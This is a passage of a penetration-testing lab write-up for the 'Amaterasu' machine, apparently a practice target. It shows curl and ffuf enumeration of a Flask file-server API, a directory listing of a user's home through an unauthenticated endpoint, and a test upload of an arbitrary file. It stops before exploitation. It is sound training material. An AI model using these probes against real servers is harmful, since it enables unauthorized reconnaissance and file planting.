InfoSec LAB

Amaterasu_Web_33414

Created: 3 min read

Web

Nmap discovered a Web server on the target port 33414 The running service is Werkzeug httpd 2.2.3 (Python 3.9.13)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -I -X OPTIONS http://$IP:33414/
HTTP/1.1 404 NOT FOUND
Server: Werkzeug/2.2.3 Python/3.9.13
Date: Sun, 27 Apr 2025 12:02:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -I http://$IP:33414/        
HTTP/1.1 404 NOT FOUND
Server: Werkzeug/2.2.3 Python/3.9.13
Date: Sun, 27 Apr 2025 12:02:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close

Webroot 404

Wappalyzer identified technologies involved

Fuzzing

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:33414/FUZZ -ic -e .html,.txt -fc 403
________________________________________________
 
 :: Method           : GET
 :: URL              : http://192.168.120.249:33414/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .html .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
help                    [Status: 200, Size: 137, Words: 19, Lines: 2, Duration: 28ms]
info                    [Status: 200, Size: 98, Words: 14, Lines: 2, Duration: 28ms]
:: Progress: [61434/61434] :: Job [1/1] :: 740 req/sec :: Duration: [0:01:22] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP:33414/FUZZ/ -ic -fc 403
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.120.249:33414/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________
:: Progress: [207630/207630] :: Job [1/1] :: 766 req/sec :: Duration: [0:04:50] :: Errors: 0 ::
  • /help
  • /info

/info

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/info | jq
[
  "Python File Server REST API v2.5",
  "Author: Alfredo Moroder",
  "GET /help = List of the commands"
]
  • The /info endpoint shows that this is a Python file server with REST API
  • Possible username disclosure; Alfredo Moroder

/help

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/help | jq
[
  "GET /info : General Info",
  "GET /help : This listing",
  "GET /file-list?dir=/tmp : List of the files",
  "POST /file-upload : Upload files"
]

The /help endpoint reveals that there are several API endpoint supporting features like listing and uploading file

  • /file-list?dir=
  • /file-upload

/file-list?dir=

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir= | jq                      
[
  "flask.tar.gz",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-httpd.service-ahY8MS",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-ModemManager.service-yphYDm",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-logind.service-pY2DMM",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-chronyd.service-Wrr8N4",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-dbus-broker.service-EZf7Au",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-resolved.service-Hibhb0",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-oomd.service-yES4xZ"
]
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir=/home | jq 
[
  "alfredo"
]
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir=/home/alfredo | jq
[
  ".bash_logout",
  ".bash_profile",
  ".bashrc",
  "local.txt",
  ".ssh",
  "restapi",
  ".bash_history"
]

Directory listing is done through the /file-list?dir= endpoint

/file-upload

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -X POST http://$IP:33414/file-upload                                                                             
{"message":"No file part in the request"}

The returned error appears identical to that of the official Flask REST API documentation for file upload

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -X POST  http://$IP:33414/file-upload -F "file=@test.txt" -F "filename=test.txt"                          
{"message":"File successfully uploaded"}
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ curl -s http://$IP:33414/file-list?dir= | jq                                                                             
[
  "test.txt",
  "flask.tar.gz",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-httpd.service-ahY8MS",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-ModemManager.service-yphYDm",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-logind.service-pY2DMM",
  "vmware-root_782-2965579254",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-chronyd.service-Wrr8N4",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-dbus-broker.service-EZf7Au",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-resolved.service-Hibhb0",
  "systemd-private-aaf3eff3160545eab079c1428e55f60d-systemd-oomd.service-yES4xZ",
  ".Test-unix",
  ".font-unix",
  ".XIM-unix",
  ".ICE-unix",
  ".X11-unix"
]

File upload successful. Moving on to the Exploitation phase

Interactive Graph View

Backlinks